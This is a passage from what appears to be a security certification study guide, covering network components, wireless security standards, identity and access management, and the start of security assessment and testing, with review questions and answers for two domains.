Layer 2 frame is sent through an IP layer, the Layer 2 data is encapsulated into 45 a Layer 3 packet, which adds the IP-specific information. Additionally, that layer can have other TCP or UDP data added to it for Layer 4 communication.  Converged protocols. Like encapsulation, converged protocols enable communication over different mediums. For example, FCoE sends typical fibre channel control commands over Ethernet. Voice over IP (VoIP) sends SIP or other voice protocols over typical IP networks. In most cases, this provides simplicity, since the same infrastructure can be used for multiple scenarios. However, it can also add complexity by introducing more protocols and devices to manage and maintain on that same infrastructure.  Software-defined networks. As networks, cloud services and multi-tenancy grow, the need to manage these networks has changed. Many networks follow either a two-tier (spine/leaf or core/access) or a three-tier (core, distribution, edge/access) topology. While the core network might not change that frequently, the edge or access devices can communicate with a variety of devices types and tenants. Increasingly, the edge or access switch is a virtual switch running on a hypervisor or virtual machine manager. You must be able to add a new subnet or VLAN or make other network changes on demand. You must be able to make configuration changes programmatically across multiple physical devices, as well as across the virtual switching devices in the topology. A software-defined network enables you to make these changes for all devices types with ease.  Wireless networks. Wireless networks can be broken into the different 802.11 standards. The most common protocols within 802.11 are shown in the table below. Additional protocols have been proposed to IEEE, including ad, ah, aj, ax, ay and az. You should be aware of the frequency that each protocol uses. 802.11 protocol Frequency Data stream rate a 5 GHz Up to 54 Mbps b 2.4 GHz Up to 11 Mbps g 2.4 GHz Up to 54 Mbps n 2.4–5 GHz Up to 600 Mbps ac 5 GHz Up to 3466 Mbps You should also be familiar with the wireless security standards:  Wired Equivalent Privacy (WEP). WEP is a legacy security algorithm for wireless networks. Originally, it was the only encryption protocol for 802.11a and 802.11b networks. WEP used 64-bit to 256-bit keys, but with a weak stream cipher. WEP was deprecated in 2004 in favor of WPA and WPA2. Today, WEP should be avoided.  Wi-Fi Protected Access (WPA). WPA uses Temporal Key Integrity Protocol (TKIP) with a 128-bit per-packet key. However, WPA is still vulnerable to password cracking from packet spoofing on a network. WPA typically uses a pre-shared key (PSK) and Temporal Key Integrity Protocol (TKIP) for encryption. This is known as WPA Personal (which is typically used in a home environment). There is also a WPA Enterprise which can use certificate authentication or an authentication server (such as a RADIUS server).  Wi-Fi Protected Access II (WPA 2). WPA2 is the current standard for wireless encryption. WPA2 is based on the Advanced Encryption Standard (AES) cipher with message authenticity and integrity checking. AES is stronger than TKIP. Like WPA, WPA2 offers a PSK mode (for home or small business) and an enterprise mode (known as WPA2-ENT). WPA2-ENT uses a new encryption key each time a user connects. The 46 password is not stored on the client devices (unlike PSK mode, which stores the passwords locally on clients). Regardless of the security method you use, you should also use TLS or IPsec for network communication. Finally, remember that wireless networks use collision avoidance, instead of the collision detection used on wired networks. 4.2 Secure network components The components of a network make up the backbone of the logical infrastructure for an organization. These components are often critical to day-to-day operations, and an outage or security issue can cause millions of dollars in business losses. Here are issues to pay attention to:  Operation of hardware. Modems are a type of Channel Service Unit/Data Service Unit (CSU/DSU) typically used for converting analog signals into digital. In this scenario, the CSU handles communication to the provider network, while the DSU handles communication with the internal digital equipment (in most cases, a router). Modems typically operate on Layer 2 of the OSI model. Routers operate on Layer 3 of the OSI model, and make the connection from a modem available to multiple devices in a network topology, including switches, access points and endpoint devices. Switches are typically connected to a router to enable multiple devices to use the connection. Switches help provide internal connectivity, as well as create separate broadcast domains when configured with VLANs. Switches typically operate at Layer 2 of the OSI model, but many switches can operate at both Layer 2 and Layer 3. Access points can be configured in the network topology to provide wireless access using one of the protocols and encryption algorithms discussed in section 4.1.  Transmission media. Wired transmission media can typically be described in three categories: coaxial, Ethernet and fiber. Coaxial is typically used with cable modem installations to provide connectivity to an ISP, and requires a modem to convert the analog signals to digital. While Ethernet can be used to describe many mediums, it is typically associated with Category 5 and Category 6 unshielded twisted-pair (UTP) or shielded twisted pair (STP), and can be plenum-rated for certain installations. Fiber typically comes in two options, single-mode or multi-mode. Singlemode is typically used for long-distance communication, over several kilometers or miles. Multi-mode fiber is typically used for faster transmission, but with a distance limit depending on the desired speed. Fiber is most often used in the datacenter for backend components.  Network access control (NAC) devices. Much as you need to control physical access to equipment and wiring, you need to use logical controls to protect a network. There are a variety of devices that provide this type of protection, including the following:  Stateful and stateless firewalls can perform inspection of the network packets that traverse it and use rules, signatures and patterns to determine whether the packet should be delivered. Reasons for dropping a packet could include addresses that don’t exist on the network, ports or addresses that are blocked, or the content of the packet (such as malicious packets that have been blocked by administrative policy).  Intrusion detection and prevention devices. These devices monitor the network for unusual network traffic and MAC or IP address spoofing, and then either alert on or actively stop this type of traffic. 47  Proxy or reverse proxy servers. Proxy servers can be used to proxy internet-bound traffic to the internet, instead of having clients going directly to the internet. Reverse proxies are often deployed to a perimeter network. They proxy communication from the internet to an internal server, such as a web server. Like a firewall, a reverse proxy can have rules and policies to block certain types of communication.  Endpoint security. The saying “a chain is only as strong as its weakest link” can also apply to your network. Endpoint security can be the most difficult to manage and maintain, but also the most important part of securing a network. It can include authentication on endpoint devices, multifactor authentication, volume encryption, VPN tunnels and network encryption, remote access, anti-virus and anti-malware software, and more. Unauthorized access to an endpoint device is one of the easiest backdoor methods into a network because the attack surface is so large. Attackers often target endpoint devices hoping to use the compromised device as a launching spot for lateral movement and privilege escalation. Beyond the traditional endpoint protection methods, there are others that provide additional security:  Application whitelisting. Only applications on the whitelist can run on the endpoint. This can minimize the chances of malicious applications being installed or run.  Restricting the use of removable media. In a high-security organization, you should minimize or eliminate the use of removable media, including any removable storage devices that rely on USB or other connection methods. This can minimize malicious files coming into the network from the outside, as well as data leaving the company on tiny storage mechanisms.  Automated patch management. Patch management is the most critical task for maintaining endpoints. You must patch the operating system as well as all third-party applications. Beyond patching, staying up to date on the latest versions can bring enhanced security.  Content-distribution networks (CDNs). CDNs are used to distribute content globally. They are typically used for downloading large files from a repository. The repositories are synchronized globally, and then each incoming request for a file or service is directed to the nearest service location. For example, if a request comes from Asia, a local repository in Asia, rather than one in the United States. would provide the file access. This reduces the latency of the request and typically uses less bandwidth. CDNs are often more resistant to denial of service (DoS) attacks than typical corporate networks, and they are often more resilient.  Physical devices. Physical security is one of the most important aspects of securing a network. Most network devices require physical access to perform a reset, which can cause configurations to be deleted and grant the person full access to the device and an easy path to any devices attached to it. The most common methods for physical access control are code-based or card-based access. Unique codes or cards are assigned to individuals to identify who accessed which physical doors or locks in the secure environment. Secure building access can also involve video cameras, security personnel, reception desks and more. In some high-security organizations, it isn’t uncommon to physically lock computing devices to a desk. In the case of mobile devices, it is often best to have encryption and strong security policies to reduce the impact of stolen devices because physically protecting them is difficult. 48 4.3 Implement secure communication channels according to design This section focuses on securing data in motion. You need to understand both design and implementation aspects.  Voice. As more organizations switch to VoIP, voice protocols such as SIP have become common on Ethernet networks. This has introduced additional management, either by using dedicated voice VLANs on networks, or establishing quality of service (QoS) levels to ensure that voice traffic has priority over non-voice traffic. Other webbased voice applications make it more difficult to manage voice as a separate entity. The consumer Skype app, for example, allows for video and voice calls over the internet. This can cause additional bandwidth consumption that isn’t typically planned for in the network topology design or purchased from an ISP.  Multimedia collaboration. There are a variety of new technologies that allow instant collaboration with colleagues. Smartboards and interactive screens make meeting in the same room more productive. Add in video technology, and someone thousands of miles away can collaborate in the same meeting virtually. Instant messaging through Microsoft Teams, Slack and other applications enables real-time communication. Mobile communication has become a huge market, with mobile apps such as WhatsApp, WeChat and LINE making realtime communication possible anywhere in the world.  Remote access. Because of the abundance of connectivity, being productive in most job roles can happen from anywhere. Even in a more traditional environment, someone working outside of the office can use a VPN to connect and access all the internal resources for an organization. Taking that a step further, Remote Desktop Services (RDS) and virtual desktop infrastructure (VDI) can give you the same experience whether you’re in the office or at an airport: If you have an internet connection, you can access the files and applications that you need to be productive. A screen scraper is a security application that captures a screen (such as a server console or session) and either records the entire session or takes a screen capture every couple of seconds. Screen scraping can help establish exactly what a person did when they logged into a computer. Screen scrapers are most often used on servers or remote connectivity solutions (such as VDI or Remote Desktop farms).  Data communications. Whether you are physically in an office or working remotely, the communication between the devices being used should be encrypted. This prevents any unauthorized device or person from openly reading the contents of packets as they are sent across a network. Corporate networks can be segmented into multiple VLANs to separate different resources. For example, the out-of-band management for certain devices can be on a separate VLAN so that no other devices can communicate unless necessary. Production and development traffic can be segmented on different VLANs. An office building with multiple departments or building floors can have separate VLANs for each department or each floor in the building. Logical network designs can tie into physical aspects of the building as necessary. Even with VLAN segments, the communication should be encrypted using TLS, SSL or IPSec.  Virtualized networks. Many organizations use hypervisors to virtualize servers and desktops for increased density and reliability. However, to host multiple servers on a single hypervisor, the Ethernet and storage networks must also be virtualized. VMware vSphere and Microsoft Hyper-V both use virtual network and storage switches to allow communication between virtual machines and the physical network. The guest operating systems running in the VMs use a synthetic network or storage adapter, which is relayed to the physical adapter on the host. The softwaredefined networking on the hypervisor can control the VLANs, port isolation, bandwidth and other aspects just as if it was a physical port. 49 Domain 4 Review Questions Read and answer the following questions. If you do not get at least one correct, then spend more time with the subject. Then move on to Domain 5. 1. You are troubleshooting some anomalies with network communication on your network. You notice that some communication isn’t taking the expected or most efficient route to the destination. Which layer of the OSI model you should troubleshoot? a. Layer 2 b. Layer 3 c. Layer 4 d. Layer 5 e. Layer 7 2. A wireless network has a single access point and two clients. One client is on the south side of the building toward the edge of the network. The other client is on the north side of the building, also toward the edge of the network. The clients are too far from each other to see each other. In this scenario, which technology can be used to avoid collisions? a. Collision detection b. Collision avoidance c. Channel service unit d. Data service unit 3. Your company uses VoIP for internal telephone calls. You are deploying a new intrusion detection system and need to capture traffic related to internal telephone calls only. Which protocol should you capture? a. H.264 b. DNS c. H.263 d. HTTPS e. SIP 50 Answers to Domain 4 Review Questions 1. Answer: B Explanation: In this scenario, the information indicates that the issue is with the routing of the network communication. Routing occurs at Layer 3 of the OSI model. Layer 3 is typically handled by a router or the routing component of a network device. 2. Answer: B Explanation: In this scenario, collision avoidance is used. Wireless networks use collision avoidance specifically to address the issue described in the scenario (which is known as the “hidden node problem”). 3. Answer: E Explanation: SIP is a communications protocol used for multimedia communication such as internal voice calls. In this scenario, you need to capture SIP traffic to ensure that you are only capturing traffic related to the phone calls. 51 Domain 5. Identity and Access Management (IAM) This section covers technologies and concepts related to authentication and authorization, for example, usernames, passwords and directories. While it isn’t a huge domain, it is technical and there are many important details related to the design and implementation of the technologies. 5.1 Control physical and logical access to assets There are some common methods for controlling access without regard for the asset type. For example, we need a way to authenticate users — validate that they are who they say they are. Then we need a way to authorize the users — figure out whether they are authorized to perform the requested action for the specific asset (such as read or write a given file or enter a particular server room). Let’s take a closer look at how authentication and authorization typically work.  Authentication. Traditional authentication systems rely on a username and password, especially for authenticating to computing devices. LDAP directories are commonly used to store user information, authenticate users and authorize users. But there are newer systems that enhance the authentication experience. Some replace the traditional username and password systems, while others (such as single sign-on, or SSO), extend them. Biometrics is an emerging authentication method that includes (but is not limited to) fingerprints, retina scans, facial recognition and iris scans.  Authorization. Traditional authorization systems rely on security groups in a directory, such as an LDAP directory. Based on your group memberships, you have a specific type of access (or no access). For example, administrators might grant one security group read access to an asset, while a different security group might get read/write/execute access to the asset. This type of system has been around a long time and is still the primary authorization mechanism for on-premises technologies. Newer authorization systems incorporate dynamic authorization or automated authorization. For example, the authorization process might check to see if you are in the Sales department and in a management position before you can gain access to certain sales data. Other information can be incorporated into authorization. For example, you can authenticate and get read access to a web-based portal, but you can’t get into the admin area of the portal unless you are connected to the corporate network. Next, let’s look at some key details around controlling access to specific assets.  Information. “Information” and “data” are interchangeable here. Information is often stored in shared folders or in storage available via a web portal. In all cases, somebody must configure who can gain access and which actions they can perform. The type of authentication isn’t relevant here. Authorization is what you use to control the access.  Systems. In this context, “systems” can refer to servers or applications, either on premises or in the cloud. You need to be familiar with the various options for controlling access. In a hybrid scenario, you can use federated authentication and authorization in which the cloud vendor trusts your on-premises authentication and 52 authorization solutions. This centralized access control is quite common because it gives organizations complete control no matter where the systems are.  Devices. Devices include computers, smartphones and tablets. Today, usernames and passwords (typically from an LDAP directory) are used to control access to most devices. Fingerprints and other biometric systems are common, too. In high-security environments, users might have to enter a username and password and then use a second authentication factor (such as a code from a smartcard) to gain access to a device. Beyond gaining access to devices, you also need to account for the level of access. In high-security environments, users should not have administrative access to devices, and only specified users should be able to gain access to particular devices.  Facilities. Controlling access to facilities (buildings, parking garages, server rooms, etc.) is typically handled via badge access systems. Employees carry a badge identifying them and containing a chip. Based on their department and job role, they will be granted access to certain facilities (such as the main doors going into a building) but denied access to other facilities (such as the power plant or the server room). For high-security facilities, such as a data center, it is common to have multi-factor authentication. For example, you must present a valid identification card to a security guard and also go through a hand or facial scan to gain access to the data center. Once inside, you still need to use a key or smartcard to open racks or cages. 5.2 Manage identification and authentication of people, devices and services This section builds on the previous section. The subtopics are more operational in nature and go into more detail.  Identity management implementation. We looked briefly at SSO and LDAP. Now, we will look at them in more detail.  SSO. Single sign-on provides an enhanced user authentication experience as the user accesses multiple systems and data across a variety of systems. It is closely related to federated identity management (which is discussed later in this section). Instead of authenticating to each system individually, the recent sign-on is used to create a security token that can be reused across apps and systems. Thus, a user authenticates once and then can gain access to a variety of systems and data without having to authenticate again. Typically, the SSO experience will last for a specified period, such as 4 hours or 8 hours. SSO often takes advantage of the user’s authentication to their computing device. For example, a user signs into their device in the morning, and later when they launch a web browser to go to a time-tracking portal, the portal accepts their existing authentication. SSO can be more sophisticated. For example, a user might be able to use SSO to seamlessly gain access to a web-based portal, but if the user attempts to make a configuration change, the portal might prompt for authentication before allowing the change. Note that using the same username and password to access independent systems is not SSO. Instead, it is often referred to as “same sign-on” because you use the same credentials. The main benefit of SSO is also its main downside: It simplifies the process of gaining access to multiple systems for everyone. For example, if attackers compromise a user’s credentials, they can sign into the computer and then seamlessly gain access to all apps using SSO. Multifactor authentication can help mitigate this risk.  LDAP. Lightweight Directory Access Protocol (LDAP) is a standards-based protocol (RFC 4511) that traces its roots back to the X.500 standard that came out in the early 1990s. Many vendors have implemented LDAP-compliant systems and LDAP-compliant directories, often with vendor-specific enhancements. LDAP 53 is especially popular for on-premises corporate networks. An LDAP directory stores information about users, groups, computers, and sometimes other objects such as printers and shared folders. It is common to use an LDAP directory to store user metadata, such as their name, address, phone numbers, departments, employee number, etc. Metadata in an LDAP directory can be used for dynamic authentication systems or other automation. The most common LDAP system today is Microsoft Active Directory (Active Directory Domain Services or AD DS). It uses Kerberos (an authentication protocol that offers enhanced security) for authentication, by default.  Single- or multi-factor authentication. There are three different authentication factors — something you know, something you have and something you are. Each factor has many different methods. Something you know could be a username and password or the answer to a personal question; something you have could be a smartcard or a phone, and something you are could be a fingerprint or retinal scan. Single-factor authentication requires only one method from any of the three factors — usually a username and password. Multi-factor authentication (MFA) requires a method from each of two or three different factors, which generally increases security. For example, requiring you to provide a code sent to a hard token in addition to a username and password increases security because an attacker who steals your credentials is unlikely to also have access to the hard token. Different methods provide different levels of security, though. For example, the answer to a personal question isn’t as secure as a token from a security app on your phone, because a malicious user is much more likely to be able to discover the information to answer the question on the internet than to get access to your phone. One downside to multi-factor authentication is the complexity it introduces; for instance, if a user doesn’t have their mobile phone or token device with them, they can’t sign in. To minimize issues, you should provide options for the second method (for example, the user can opt for a phone call to their landline).  Accountability. In this context, accountability is the ability to track users’ actions as they access systems and data. You need to be able to identify the users on a system, know when they access it, and record what they do while on the system. This audit data must be captured and logged for later analysis and troubleshooting. Important information can be found in this data. For example, if a user successfully authenticates to a computer in New York and then successfully authenticates to a computer in London a few minutes later, that is suspicious and should be investigated. If an account has repeated bad password attempts, you need data to track down the source of the attempts. Today, many companies are centralizing accountability. For example, all servers and apps send their audit data to the centralized system, so admins can gain insight across multiple systems with a single query. Because of the enormous amount of data in these centralized systems, they are usually “big data” systems, and you can use analytics and machine learning to unearth insights into your environment.  Session management. After users authenticate, you need to manage their sessions. If a user walks away from the computer, anybody can walk up and assume their identity. To reduce the chances of that happening, you can require users to lock their computers when stepping away. You can also use session timeouts to automatically lock computers. You can also use password-protected screen savers that require the user to re-authenticate. You also need to implement session management for remote sessions. For example, if users connect from their computers to a remote server over Secure Shell (SSH) or Remote Desktop Protocol (RDP), you can limit the idle time of those sessions.  Registration and proofing of identity. With some identity management systems, users must register and provide proof of their identity. For example, with self-service password reset apps, it is common for users to register and prove their identity. If they later forget their password and need to reset it, they must authenticate using an 54 alternative method, such as providing the same answers to questions as they provided during registration. Note that questions are often insecure and should be used only when questions can be customized or when an environment doesn’t require a high level of security. One technique users can use to enhance question and answer systems is to use false answers. For example, if the question wants to know your mother’s maiden name, you enter another name which is incorrect but serves as your answer for authentication. Alternatively, you can treat the answers as complex passwords. Instead of directly answering the questions, you can use a long string of alphanumeric characters such as “Vdsfh2873423#@$wer78wreuy23143ya”.  Federated Identity Management (FIM). Note that this topic does not refer to Microsoft Forefront Identity Manager, which has the same acronym. Traditionally, you authenticate to your company’s network and gain access to certain resources. When you use identity federation, two independent organizations share authentication and/or authorization information with each other. In such a relationship, one company provides the resources (such as a web portal) and the other company provides the identity and user information. The company providing the resources trusts the authentication coming from the identity provider. Federated identity systems provide an enhanced user experience because users don’t need to maintain multiple user accounts across multiple apps. Federated identity systems use Security Assertion Markup Language (SAML), OAuth, or other methods for exchanging authentication and authorization information. SAML is the most common method for authentication in use today. It is mostly limited to use with web browsers, while OAuth isn’t limited to web browsers. Federated identity management and SSO are closely related. You can’t reasonably provide SSO without a federated identity management system. Conversely, you use federated identities without SSO, but the user experience will be degraded because everyone must re-authenticate manually as they access various systems.  Credentials management systems. A credentials management system centralizes the management of credentials. Such systems typically extend the functionality of the default features available in a typical directory service. For example, a credentials management system might automatically manage the passwords for account passwords, even if those accounts are in a third-party public cloud or in a directory service on premises. Credentials management systems often enable users to temporarily check out accounts to use for administrative purposes. For example, a database administrator might use a credentials management system to check out a database admin account in order to perform some administrative work using that account. When they are finished, they check the account back in and the system immediately resets the password. All activity is logged and access to the credentials is limited. Without a credentials management system, you run the risk of having multiple credentials management approaches in your organization. For example, one team might use an Excel spreadsheet to list accounts and passwords, while another team might use a third-party password safe application. Having multiple methods and unmanaged applications increases risks for your organization. Implementing a single credentials management system typically increases efficiency and security. 5.3 Integrate identity as a third-party service There are many third-party vendors that offer identity services that complement your existing identity store. For example, Ping Identity provides an identity platform that you can integrate with your on-premises directory (such as Active Directory) and your public cloud services (such as Microsoft Azure or Amazon AWS). Third-party identity services can help manage identities both on premises and in the cloud: 55  On premises. To work with your existing solutions and help manage identities on premises, identity services often put servers, appliances or services on your internal network. This ensures a seamless integration and provides additional features, such as single sign-on. For example, you might integrate your Active Directory domain with a third-party identity provider and thereby enable certain users to authenticate through the third-party identity provider for SSO.  Cloud. Organizations that want to take advantage of software-as-a-service (SaaS) and other cloud-based applications need to also manage identities in the cloud. Some of them choose identity federation — they federate their on-premises authentication system directly with the cloud providers. But there is another option: using a cloud-based identity service, such as Microsoft Azure Active Directory or Amazon AWS Identity and Access Management. There are some pros with using a cloud-based identity service:  You can have identity management without managing the associated infrastructure.  You can quickly start using a cloud-based identity service, typically within just a few minutes.  Cloud-based identity services are relatively inexpensive.  Cloud-based identity services offer services worldwide, often in more places and at a bigger scale than most organizations can.  The cloud provider often offers features not commonly found in on-premises environments. For example, a cloud provider can automatically detect suspicious sign-ins attempts, such as those from a different type of operating system than normal or from a different location than usual, because they have a large amount of data and can use artificial intelligence to spot suspicious logins.  For services in the cloud, authentication is local, which often results in better performance than sending all authentication requests back to an on-premises identity service. You also need to be aware of the potential downsides:  You lose control of the identity infrastructure. Because identity is a critical foundational service, some high-security organizations have policies that require complete control over the entire identity service. There is a risk in using an identity service in a public cloud, although the public cloud can sometimes be as secure or more secure than many corporate environments.  You might not be able to use only the cloud-based identity service. Many companies have legacy apps and services that require an on-premises identity. Having to manage an on-premises identity infrastructure and a cloud-based identity system requires more time and effort than just managing an on-premises environment.  If you want to use all the features of a cloud identity service, the costs rise. On-premises identity infrastructures are not expensive compared to many other foundational services such as storage or networking.  There might be a large effort required to use a cloud-based identity service. For example, you need to figure out new operational processes. You need to capture the auditing and log data and often bring it back to your on-premises environment for analysis. You might have to update, upgrade or deploy new 56 software and services. For example, if you have an existing multi-factor authentication solution, it might not work seamlessly with your cloud-based identity service.  Federated. Federation enables your organization to use their existing identities (such as those used to access your internal corporate systems) to access systems and resources outside of the company network. For example, if you use a cloud-based HR application on the internet, you can configure federation to enable employees to sign into the application with their corporate credentials. You can federate with vendors or partners. Federating between two organizations involves an agreement and software to enable your identities to become portable (and thus usable based on who you federate with). Federation typically provides the best user experience because users don’t have to remember additional passwords or manage additional identities. Other key facts about third-party identity services include:  Often, you still need an on-premises directory service.  Many third-party identity services started off as solutions for web-based applications. They have since to cover other use cases but still can’t be used for many day-to-day authentication scenarios. For example, most of them can’t authenticate users to their corporate laptops.  Third-party identity services often offer single sign-on, multi-factor authentication and meta-directory services (pulling data from multiple directories into a single third-party directory).  Many of the offerings are cloud-based, with a minimal on-premises footprint.  Third-party identity services typically support SAML, OpenID Connect, WS-Federation, OAuth and WS-Trust. 5.4 Implement and manage authorization mechanisms This section focuses on access control methods. To prepare for the exam, you should understand the core methods and the differences between them.  Role-based access control (RBAC). RBAC is a common access control method. For example, one role might be a desktop technician. The role has rights to workstations, the anti-virus software and a software installation shared folder. For instance, if a new desktop technician starts at your company, you simply add them to the role group and they immediately have the same access as other desktop technicians. RBAC is a non-discretionary access control method because there is no discretion — each role has what it has. RBAC is considered an industrystandard good practice and is in widespread use throughout organizations.  Rule-based access control. Rule-based access control implements access control based on predefined rules. For example, you might have a rule that permits read access to marketing data for anyone who is in the marketing department, or a rule that permits only managers to print to a high-security printer. Rule-based access control systems are often deployed to automate access management. Many rule-based systems can be used to implement access dynamically. For example, you might have a rule that allows anybody in the New York office to access a file server in New York. If a user tries to access the file server from another city, they will be denied access, but if they travel to the New York office, access will be allowed. Rule-based access control methods simplify access control in some scenarios. For example, imagine a set of rules based on department, title and location. If somebody transfers 57 to a new role or a new office location, their access is updated automatically. In particular, their old access goes away automatically, addressing a major issue that plagues many organizations.  Mandatory access control (MAC). MAC is a method to restrict access based on a person’s clearance and the data’s classification or label. For example, a person with a Top Secret clearance can read a document classified as Top Secret. The MAC method ensures confidentiality. MAC is not in widespread use but is considered to provide higher security than DAC because individual users cannot change access.  Discretionary access control (DAC). When you configure a shared folder on a Windows or Linux server, you use DAC. You assign somebody specific rights to a volume, a folder or a file. Rights could include read-only, write, execute, list and more. You have granular control over the rights, including whether the rights are inherited by child objects (such as a folder inside another folder). DAC is flexible and easy. It is in widespread use. However, anybody with rights to change permissions can alter the permissions. It is difficult to reconcile all the various permissions throughout an organization. It can also be hard to determine all the assets that somebody has access to, because DAC is very decentralized.  Attribute-based access control (ABAC). Many organizations use attributes to store data about users, such as their department, cost center, manager, location, employee number and date of hire. These attributes can be used to automate authorization and to make it more secure. For example, you might configure authorization to allow only users who have “Paris” as their office location to use the wireless network at your Paris office. Or you might strengthen security for your HR folder by checking not only that users are members of a specific group, but also that their department attribute is set to “HR”. 5.5 Manage the identity and access provisioning lifecycle The identity lifecycle extends from the creation of users, to the provisioning of access, to the management of users, to the deprovisioning of access or users. While there are several methods to manage this lifecycle, the following ordered steps provide an overview of the typical implementation process: 1. A new user is hired at a company. 2. The HR department creates a new employee record in the human capital management (HCM) system, which is the authoritative source for identity information such as legal name, address, title and manager. 3. The HCM syncs with the directory service. As part of the sync, any new users in HCM are provisioned in the directory service. 4. The IT department populates additional attributes for the user in the directory service. For example, the users’ email address and role might be added. 5. The IT department performs maintenance tasks such as resetting the user’s password and changing the user’s roles when they move to a new department. 58 6. The employee leaves the company. The HR department flags the user as terminated in the HCM, and the HCM performs an immediate sync with the directory service. The directory service disables the user account to temporarily remove access. 7. The IT department, after a specific period (such as 7 days), permanently deletes the user account and all associated access. Beyond these steps, there are additional processes involved in managing identity and access:  User access review. You should perform periodic access reviews in which appropriate personnel attest that each user has the appropriate rights and permissions. Does the user have only the access they need to perform their job? Were all permissions granted through the company’s access request process? Is the granting of access documented and available for review? You should also review the configuration of your identity service to ensure it adheres to known good practices. You should review the directory service for stale objects (for example, user accounts for employees who have left the company). The primary goal is to ensure that users have the access permissions they need and nothing more. If a terminated user still has a valid user account, then you are in violation of your primary goal.  System account access review. System accounts are accounts that are not tied one-to-one to humans. They are often used to run automated processes, jobs, and tasks. System accounts sometimes have elevated access. In fact, it isn’t uncommon to find system accounts with the highest level of access (root or administrative access). System accounts require review similar to user accounts. You need to find out if system accounts have the minimum level of permissions required for what they are used for. And you need to be able to show the details — who provided the access, the date it was granted, and what the permissions provide access to.  Provisioning and deprovisioning. Account creation and account deletion — provisioning and deprovisioning — are key tasks in the account lifecycle. Create accounts too early and you have dormant accounts that can be targeted. Wait too long to disable and delete accounts and you also have dormant accounts that can be targeted. When feasible, it is a good practice to automate provisioning and deprovisioning. Automation helps reduce the time to create and delete accounts. It also reduces human error (although the automation code could have human error). Your company should establish guidelines for account provisioning and deprovisioning. For example, your company might have a policy that an account must be disabled while the employee is in the meeting being notified of their termination. 59 Domain 5 Review Questions Read and answer the following questions. If you do not get at least one of them correct, then spend more time with the subject. Then move on to Domain 6. 1. You are implementing a multi-factor authentication solution. As part of the design, you are capturing the three authentication factors. What are they? a. Something you make b. Something you know c. Something you have d. Something you need e. Something you are f. Something you do 2. Your company is rapidly expanding its public cloud footprint, especially with Infrastructure as a Service (IaaS), and wants to update its authentication solution to enable users to be authenticated to services in the cloud that are yet to be specified. The company issues the following requirements:  Minimize the infrastructure required for the authentication.  Rapidly deploy the solution.  Minimize the overhead of managing the solution. You need to choose the authentication solution for the company. Which solution should you choose? a. A federated identity solution b. A cloud-based identity service c. A multi-factor authentication solution d. A third-party identity service 3. A user reports that they cannot gain access to a shared folder. You investigate and find the following information:  Neither the user nor any groups the user is a member of have been granted permissions to the folder.  Other users and groups have been granted permissions to the folder.  Another IT person on your team reports that they updated the permissions on the folder recently. Based on the information in this scenario, which type of access control is in use? a. RBAC b. Rule-based access control c. MAC d. DAC 60 Answers to Domain 5 Review Questions 1. Answer: B, C, E Explanation: The three factors are something you know (such as a password), something you have (such as a smartcard or authentication app), and something you are (such as a fingerprint or retina). Using methods from multiple factors for authentication enhances security and mitigates the risk of a stolen or cracked password. 2. Answer: B Explanation: With the rapid expansion to the cloud and the type of services in the cloud unknown, a cloud-based identity service, especially one from your public cloud vendor, is the best choice. Such services are compatible with IaaS, SaaS and PaaS solutions. While a third-party identity service can handle SaaS, it will not be as capable in nonSaaS scenarios. A federated identity solution is also limited to certain authentication scenarios and requires more time to deploy and more work to manage. 3. Answer: D Explanation: Because you found individual users being granted permissions, and an IT administrator had manually changes permissions on the folder, DAC is in use. RBAC uses roles, and rule-based access control relies on rules and user attributes, so you would not find individual users configured with permissions on the folder with either of these. MAC is based on clearance levels, so, again, users aren’t individually granted permissions on a folder; instead, a group for each clearance is used. 61 Domain 6. Security Assessment and Testing This section covers assessments and audits, along with all the technologies and techniques you will be expected to know to perform them. 6.1 Design and validate assessment, test and audit strategies An organization’s assessment, testing and audit strategies will depend on its size, industry, financial status and other factors. For example, a small non-profit, a small private company and a small public company will all have different requirements and goals. Like any procedure or policy, the audit strategy should be assessed and tested regularly to ensure that the organization is not doing a disservice to itself with the current strategy. There are three types of audit strategies:  Internal. An internal audit strategy should be aligned to the organization’s business and day-to-day operations. For example, a publicly traded company will have a more rigorous auditing strategy than a privately held company. However, the stakeholders in both companies have an interest in protecting intellectual property, customer data and employee information. Designing the audit strategy should include laying out applicable regulatory requirements and compliance goals.  External. An external audit strategy should complement the internal strategy, providing regular checks to ensure that procedures are being followed and the organization is meeting its compliance goals.  Third-party. Third-party auditing provides a neutral and objective approach to reviewing the existing design, methods for testing and overall strategy for auditing the environment. A third-party audit can also ensure that both internal and external auditors are following the processes and procedures that are defined as part of the overall strategy. 6.2 Conduct security control testing Security control testing can include testing of the physical facility, logical systems and applications. Here are the common testing methods:  Vulnerability assessment. The goal of a vulnerability assessment is to identify elements in an environment that are not adequately protected. This does not always have to be from a technical perspective; you can also assess the vulnerability of physical security or the external reliance on power, for instance. These assessments can include personnel testing, physical testing, system and network testing, and other facilities tests.  Penetration testing. A penetration test is a purposeful attack on systems to attempt to bypass automated controls. The goal of a penetration test is to uncover weaknesses in security so they can be addressed to mitigate risk. Attack techniques can include spoofing, bypassing authentication, privilege escalation and more. Like vulnerability assessments, penetration testing does not have to be purely logical. For example, you can use social engineering to try to gain physical access to a building or system. 62  Log reviews. IT systems can log anything that occurs on the system, including access attempts and authorizations. The most obvious log entries to review are any series of “deny” events, since someone is attempting to access something that they don’t have permissions for. It’s more difficult to review successful events, since there are generally thousands of them, and almost all of them follow existing policies. However, it can be important to show that someone or something did indeed access a resource that they weren’t supposed to, either by mistake or through privilege escalation. A procedure and software to facilitate frequent review of logs is essential.  Synthetic transactions. While user monitoring captures actual user actions in real time, synthetic — scripted or otherwise artificial — transactions can be used to test system performance or security.  Code review and testing. Security controls are not limited to IT systems. The application development lifecycle must also include code review and testing for security controls. These reviews and controls should be built into the process just as unit tests and function tests are; otherwise, the application is at risk of being unsecure.  Misuse case testing. Software and systems can both be tested for use for something other than its intended purpose. From a software perspective, this could be to reverse engineer the binaries or to access other processes through the software. From an IT perspective, this could be privilege escalation, sharing passwords and accessing resources that should be denied.  Test coverage analysis. You should be aware of the following coverage testing types:  Black box testing. The tester has no prior knowledge of the environment being tested.  White box testing. The tester has full knowledge prior to testing.  Dynamic testing. The system that is being tested is monitored during the test.  Static testing. The system that is being tested is not monitored during the test.  Manual testing. Testing is performed manually by humans.  Automated testing. A script performs a set of actions.  Structural testing. This can include statement, decision, condition, loop and data flow coverage.  Functional testing. This includes normal and anti-normal tests of the reaction of a system or software. Anti-normal testing goes through unexpected inputs and methods to validate functionality, stability and robustness.  Negative testing. This test purposely uses the system or software with invalid or harmful data, and verifies that the system responds appropriately.  Interface testing. This can include the server interfaces, as well as internal 